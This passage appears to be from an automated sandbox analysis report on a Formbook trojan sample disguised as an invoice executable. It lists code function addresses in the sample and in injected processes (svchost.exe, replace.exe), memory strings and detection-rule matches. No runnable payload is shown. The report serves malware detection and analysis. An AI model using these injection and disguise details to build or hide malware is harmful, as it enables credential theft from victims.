Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_004033C0	0_2_004033C0
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0044F430	0_2_0044F430
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_004125E8	0_2_004125E8
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0044663B	0_2_0044663B
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_00413801	0_2_00413801
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0042096F	0_2_0042096F
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_004129D0	0_2_004129D0
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_004119E3	0_2_004119E3
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0041C9AE	0_2_0041C9AE
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0047EA6F	0_2_0047EA6F
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0040FA10	0_2_0040FA10
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0044EB5F	0_2_0044EB5F
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_00423C81	0_2_00423C81
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_00411E78	0_2_00411E78
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_00442E0C	0_2_00442E0C
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_00420EC0	0_2_00420EC0
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0044CF17	0_2_0044CF17
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_00444FD2	0_2_00444FD2
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_040A7280	0_2_040A7280
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004182E3	2_2_004182E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403040	2_2_00403040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042E903	2_2_0042E903
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401210	2_2_00401210
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FB53	2_2_0040FB53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402370	2_2_00402370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004164C3	2_2_004164C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FD73	2_2_0040FD73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DDF3	2_2_0040DDF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039003E6	2_2_039003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA352	2_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C02C0	2_2_038C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F41A2	2_2_038F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039001AA	2_2_039001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F81CC	2_2_038F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830100	2_2_03830100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C8158	2_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383C7C0	2_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864750	2_2_03864750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385C6E0	2_2_0385C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03900591	2_2_03900591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EE4F6	2_2_038EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4420	2_2_038E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F2446	2_2_038F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F6BD7	2_2_038F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FAB40	2_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390A9A6	2_2_0390A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038268B8	2_2_038268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E8F0	2_2_0386E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384A840	2_2_0384A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03842840	2_2_03842840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BEFA0	2_2_038BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832FC8	2_2_03832FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384CFE0	2_2_0384CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03882F28	2_2_03882F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860F30	2_2_03860F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E2F30	2_2_038E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4F40	2_2_038B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852E90	2_2_03852E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FCE93	2_2_038FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FEEDB	2_2_038FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FEE26	2_2_038FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840E59	2_2_03840E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03858DBF	2_2_03858DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383ADE0	2_2_0383ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384AD00	2_2_0384AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DCD1F	2_2_038DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0CB5	2_2_038E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830CF2	2_2_03830CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840C00	2_2_03840C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0388739A	2_2_0388739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F132D	2_2_038F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382D34C	2_2_0382D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038452A0	2_2_038452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385B2C0	2_2_0385B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E12ED	2_2_038E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384B1B0	2_2_0384B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387516C	2_2_0387516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382F172	2_2_0382F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390B16B	2_2_0390B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EF0CC	2_2_038EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038470C0	2_2_038470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F70E9	2_2_038F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF0E0	2_2_038FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF7B0	2_2_038FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F16CC	2_2_038F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03885630	2_2_03885630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DD5B0	2_2_038DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039095C3	2_2_039095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7571	2_2_038F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF43F	2_2_038FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03831460	2_2_03831460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385FB80	2_2_0385FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B5BF0	2_2_038B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387DBF9	2_2_0387DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFB76	2_2_038FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DDAAC	2_2_038DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03885AA0	2_2_03885AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E1AA3	2_2_038E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EDAC6	2_2_038EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFA49	2_2_038FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7A46	2_2_038F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B3A6C	2_2_038B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D5910	2_2_038D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03849950	2_2_03849950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385B950	2_2_0385B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038438E0	2_2_038438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AD800	2_2_038AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03841F92	2_2_03841F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFFB1	2_2_038FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03803FD2	2_2_03803FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03803FD5	2_2_03803FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFF09	2_2_038FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03849EB0	2_2_03849EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385FDC0	2_2_0385FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03843D40	2_2_03843D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F1D5A	2_2_038F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7D73	2_2_038F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFCF2	2_2_038FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B9C32	2_2_038B9C32
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Code function: 4_2_03D5B3A1	4_2_03D5B3A1
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Code function: 4_2_03D54A31	4_2_03D54A31
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Code function: 4_2_03D5D1C1	4_2_03D5D1C1
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Code function: 4_2_03D737E1	4_2_03D737E1
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Code function: 4_2_03D52CD1	4_2_03D52CD1
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Code function: 4_2_03D54C51	4_2_03D54C51
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B002C0	5_2_02B002C0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B20274	5_2_02B20274
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B403E6	5_2_02B403E6
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A8E3F0	5_2_02A8E3F0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B3A352	5_2_02B3A352
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B12000	5_2_02B12000
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B341A2	5_2_02B341A2
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B401AA	5_2_02B401AA
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B381CC	5_2_02B381CC
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A70100	5_2_02A70100
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B1A118	5_2_02B1A118
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B08158	5_2_02B08158
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A9C6E0	5_2_02A9C6E0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A7C7C0	5_2_02A7C7C0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A80770	5_2_02A80770
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AA4750	5_2_02AA4750
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B2E4F6	5_2_02B2E4F6
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B24420	5_2_02B24420
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B32446	5_2_02B32446
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B40591	5_2_02B40591
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A80535	5_2_02A80535
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A7EA80	5_2_02A7EA80
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B36BD7	5_2_02B36BD7
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B3AB40	5_2_02B3AB40
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A668B8	5_2_02A668B8
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AAE8F0	5_2_02AAE8F0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A8A840	5_2_02A8A840
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A82840	5_2_02A82840
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A829A0	5_2_02A829A0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B4A9A6	5_2_02B4A9A6
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A96962	5_2_02A96962
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B3CE93	5_2_02B3CE93
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A92E90	5_2_02A92E90
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B3EEDB	5_2_02B3EEDB
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B3EE26	5_2_02B3EE26
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A80E59	5_2_02A80E59
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AFEFA0	5_2_02AFEFA0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A8CFE0	5_2_02A8CFE0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A72FC8	5_2_02A72FC8
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B22F30	5_2_02B22F30
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AC2F28	5_2_02AC2F28
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AA0F30	5_2_02AA0F30
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AF4F40	5_2_02AF4F40
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B20CB5	5_2_02B20CB5
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A70CF2	5_2_02A70CF2
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A80C00	5_2_02A80C00
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A98DBF	5_2_02A98DBF
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A7ADE0	5_2_02A7ADE0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A8AD00	5_2_02A8AD00
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B1CD1F	5_2_02B1CD1F
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A852A0	5_2_02A852A0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B212ED	5_2_02B212ED
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A9B2C0	5_2_02A9B2C0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AC739A	5_2_02AC739A
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B3132D	5_2_02B3132D
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A6D34C	5_2_02A6D34C
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B3F0E0	5_2_02B3F0E0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B370E9	5_2_02B370E9
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A870C0	5_2_02A870C0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B2F0CC	5_2_02B2F0CC
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A8B1B0	5_2_02A8B1B0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB516C	5_2_02AB516C
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A6F172	5_2_02A6F172
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B4B16B	5_2_02B4B16B
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B316CC	5_2_02B316CC
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AC5630	5_2_02AC5630
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B3F7B0	5_2_02B3F7B0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B3F43F	5_2_02B3F43F
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A71460	5_2_02A71460
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B1D5B0	5_2_02B1D5B0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B495C3	5_2_02B495C3
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B37571	5_2_02B37571
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AC5AA0	5_2_02AC5AA0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B21AA3	5_2_02B21AA3
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B1DAAC	5_2_02B1DAAC
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B2DAC6	5_2_02B2DAC6
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AF3A6C	5_2_02AF3A6C
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B37A46	5_2_02B37A46
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B3FA49	5_2_02B3FA49
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A9FB80	5_2_02A9FB80
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02ABDBF9	5_2_02ABDBF9
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AF5BF0	5_2_02AF5BF0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B3FB76	5_2_02B3FB76
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A838E0	5_2_02A838E0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AED800	5_2_02AED800
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B15910	5_2_02B15910
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A89950	5_2_02A89950
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A9B950	5_2_02A9B950
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A89EB0	5_2_02A89EB0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B3FFB1	5_2_02B3FFB1
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A81F92	5_2_02A81F92
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A43FD5	5_2_02A43FD5
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A43FD2	5_2_02A43FD2
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B3FF09	5_2_02B3FF09
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B3FCF2	5_2_02B3FCF2
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AF9C32	5_2_02AF9C32
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A9FDC0	5_2_02A9FDC0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B37D73	5_2_02B37D73
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02A83D40	5_2_02A83D40
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02B31D5A	5_2_02B31D5A
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02131950	5_2_02131950
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_0212CAB0	5_2_0212CAB0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_0212AB30	5_2_0212AB30
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_0212C890	5_2_0212C890
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02133200	5_2_02133200
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02135020	5_2_02135020
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_0214B640	5_2_0214B640
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_0293E238	5_2_0293E238
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_0293E353	5_2_0293E353
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_0293E6EC	5_2_0293E6EC
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_0293D758	5_2_0293D758
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_0293C9F8	5_2_0293C9F8

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03887E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0382B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03875130 appears 58 times
Source: C:\Windows\SysWOW64\replace.exe	Code function: String function: 02AC7E54 appears 111 times
Source: C:\Windows\SysWOW64\replace.exe	Code function: String function: 02A6B970 appears 280 times
Source: C:\Windows\SysWOW64\replace.exe	Code function: String function: 02AEEA12 appears 86 times
Source: C:\Windows\SysWOW64\replace.exe	Code function: String function: 02AB5130 appears 58 times
Source: C:\Windows\SysWOW64\replace.exe	Code function: String function: 02AFF290 appears 105 times
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: String function: 00445AE0 appears 55 times

Source: Revised Invoice H000127896.exe, 00000000.00000003.2068678336.000000000478D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Revised Invoice H000127896.exe
Source: Revised Invoice H000127896.exe, 00000000.00000003.2069987307.0000000003E13000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Revised Invoice H000127896.exe

Source: Revised Invoice H000127896.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
